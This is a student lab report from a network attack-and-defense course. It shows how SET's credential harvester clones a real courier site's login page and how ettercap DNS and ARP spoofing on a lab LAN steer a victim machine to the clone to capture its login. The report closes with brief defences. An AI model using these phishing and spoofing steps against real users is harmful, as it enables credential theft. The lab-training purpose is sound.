20192426 2021-2022-2 《网络与系统攻防技术》实验七实验报告

20192426 2021-2022-2 《网络与系统攻防技术》实验七实验报告

1.实验内容

本实践的目标理解常用网络欺诈背后的原理，以提高防范意识，并提出具体防范方法。具体实践有

1. 简单应用SET工具建立冒名网站
2. ettercap DNS spoof
3. 结合应用两种技术，用DNS spoof引导特定访问到冒名网站。

2.实验过程

2.1 简单应用SET工具建立冒名网站

1. 首先我们查看80端口是否被占用，使用命令netstat -tupln | grep 80，可以发现该端口并没有被占用，如图一所示。

   
   图一 查看80端口占用情况

2. 输入命令setoolkit进入该工具中，使用如下命令进行网站克隆，目标网站为：天翼快递 - 用户登录http://www.tykd.com/User/login/ 。

   Select from the menu:
      1) Social-Engineering Attacks				# 社会工程学攻击
      2) Penetration Testing (Fast-Track)			# 渗透测试
      3) Third Party Modules						# 第三方组件
      4) Update the Social-Engineer Toolkit		# 更新软件
      5) Update SET configuration					# 升级配置
      6) Help, Credits, and About					# 帮助
   
     99) Exit the Social-Engineer Toolkit			# 退出程序
   
   set> 1		#选择社会工程学攻击
   

   我们在主菜单中选择社会工程学攻击（1）

   Select from the menu:
   
      1) Spear-Phishing Attack Vectors				# 鱼叉式钓鱼攻击
      2) Website Attack Vectors					# 网站攻击
      3) Infectious Media Generator				# 介质感染攻击
      4) Create a Payload and Listener				# 构造有效载荷和监听器（利用metasploit）
      5) Mass Mailer Attack						# 邮件群发
      6) Arduino-Based Attack Vector				# 基于Arduino（单片机）的攻击
      7) Wireless Access Point Attack Vector		# 无线接入点攻击
      8) QRCode Generator Attack Vector			# 二维码攻击
      9) Powershell Attack Vectors					# powershell攻击
     10) Third Party Modules						# 第三方组件
   
     99) Return back to the main menu.				# 返回主菜单
   
   set> 2		# 选择网站攻击
   

   然后选择网站攻击（2）

   Select from the menu:
   
      1) Java Applet Attack Method				# Java程序攻击
      2) Metasploit Browser Exploit Method		# 使用iFrame攻击，运行一个Metasploit载荷
      3) Credential Harvester Attack Method	# 认证获取攻击
      4) Tabnabbing Attack Method				# 标签劫持攻击
      5) Web Jacking Attack Method				# 网页劫持攻击
      6) Multi-Attack Web Method				# 综合攻击
      7) HTA Attack Method						# HTA攻击
      
     99) Return to Main Menu					# 返回主菜单
   
   set:webattack>3		# 选择认证获取攻击
   

   再选择认证获取攻击（3）

   Select from the menu:
   
      1) Web Templates							# Web模板
      2) Site Cloner							# 网站克隆
      3) Custom Import							# 自定义导入
   
     99) Return to Webattack Menu				# 返回Webattack菜单
   

   set:webattack>2		# 选择网站克隆
   # [-] Credential harvester will allow you to utilize the clone capabilities within SET
   # [-] to harvest credentials or parameters from a website as well as place them into a report
   
   set:webattack> IP address for the POST back in Harvester/Tabnabbing [10.0.2.15]:192.168.56.101	# 为了使Windows 10能够访问虚拟机的网站，故将IP设为虚拟机的桥接网卡的IP
   # [-] SET supports both HTTP and HTTPS
   # [-] Example: http://www.thisisafakesite.com
   set:webattack> Enter the url to clone:http://www.tykd.com/User/login/	# 将URL设置为天翼快递的URL
   

   设置完成后，网站就已经部署完毕了，在主机上访问192.168.56.101，输入用户名和密码并点击登录，可以发现setoolkit已经接收到了相应的用户名和密码，如图二所示。

   
   图二 setoolkit接收到相应的用户名和密码

2.2 ettercap DNS spoof

1. 首先使用命令ifconfig查看网络信息，可以发现桥接网卡对应的网卡名称为eth0，IP为192.168.1.180，如图三所示。

   
   图三 查看网络信息

2. 使用ifconfig eth0 promisc将Kali的桥接网卡改为混杂模式

3. 要实现实验的目标，我们需要使用ettercap，首先编辑ettercap的DNS表，输入命令vi /etc/ettercap/etter.dns。

   然后在最后追加一条DNS记录：www.tykd.com A 192.168.1.180，如图四所示。

   
   图四 追加一条DNS记录

4. 查看靶机IP，可以发现靶机IP为192.168.1.207，网关为192.168.1.1，此时使用命令ping www.tykd.comDNS解析出的IP为47.56.157.205。

   
   图五 查看靶机IP和网关

5. 输入ettercap -G指令开启ettercap，在弹出的界面中选择eth0并点击确定，即可监听eth0网卡。

6. 按照图六的选项选择“Hosts”——“Scan for hosts”扫描局域网中的活跃IP。

   
   图六 扫描局域网的活跃IP

7. 按照图七的方式将网关IP加入Target1，将靶机IP加入Target2。

   
   图七 将对应IP加入对应Target

8. 按照图八的选项选择“Plugins”——“Manage plugins”，然后找到dns_spoof双击该选项激活该插件。

   
   图八 激活dns_spoof插件

9. 按照图九的选项应用ARP欺骗。

   
   图九 应用ARP欺骗

10. 此时在靶机上先使用命令ipconfig /flushdns刷新DNS缓存，然后再使用命令ping www.tykd.com 检查此时的IP地址，可以发现，靶机的DNS解析出的地址为192.168.1.180，DNS欺骗成功。

    
    图十 靶机成功被ARP欺骗

2.3 结合应用两种技术，用DNS spoof引导特定访问到冒名网站

1. 将2.1中最后设置的IP地址更换为192.168.1.180，其他设置不变。

   set:webattack> IP address for the POST back in Harvester/Tabnabbing [10.0.2.15]:192.168.1.180	# 为了使Windows 10能够访问虚拟机的网站，故将IP设为虚拟机的桥接网卡的IP
   # [-] SET supports both HTTP and HTTPS
   # [-] Example: http://www.thisisafakesite.com
   set:webattack> Enter the url to clone:http://www.tykd.com/User/login/	# 将URL设置为天翼快递的URL
   

2. 2.2中的设置保持不变。

3. 在靶机上访问http://www.tykd.com/User/login/ ，输入用户名和密码，可以发现setoolkit接收到了相应的用户名和密码，如图十一所示。

   
   图十一 成功结合两种技术并获取靶机输入的用户名和密码

3.问题及解决方案

• 问题1：应用dns_spoof插件后DNS欺骗仍然失败

• 问题1解决方案：在经过多次实验后，发现只有先应用ARP欺骗才能够实现DNS欺骗，如图十二所示。

  
  图十二 应用ARP欺骗

4.学习感悟、思考等

本次实验进行了网络欺诈中的DNS欺骗相关的实践，通过动手的方式我弄懂了制作一个钓鱼网站并通过DNS欺骗的方式使靶机将自己的请求发送到钓鱼网站中。在本次实验中，经过在网上寻找相关资料，我成功地完成了相关的实验内容，值得注意的是，实现这种攻击方式的预防并不难，我们不仅可以通过使用SSL协议加密的方式来使攻击者获取到加密的信息，还可以通过将Gateway Router的IP Address和MAC Address静态绑定在一起的方式防范DNS攻击欺骗。

感谢王老师的细心讲解和耐心帮助，也感谢在实验过程中给我帮助的同学们。正因为有你们的帮助我才能够顺利地完成本次实验，谢谢！

参考资料

• kali工具 -- setoolkit(克隆网站及利用) -- 玉宾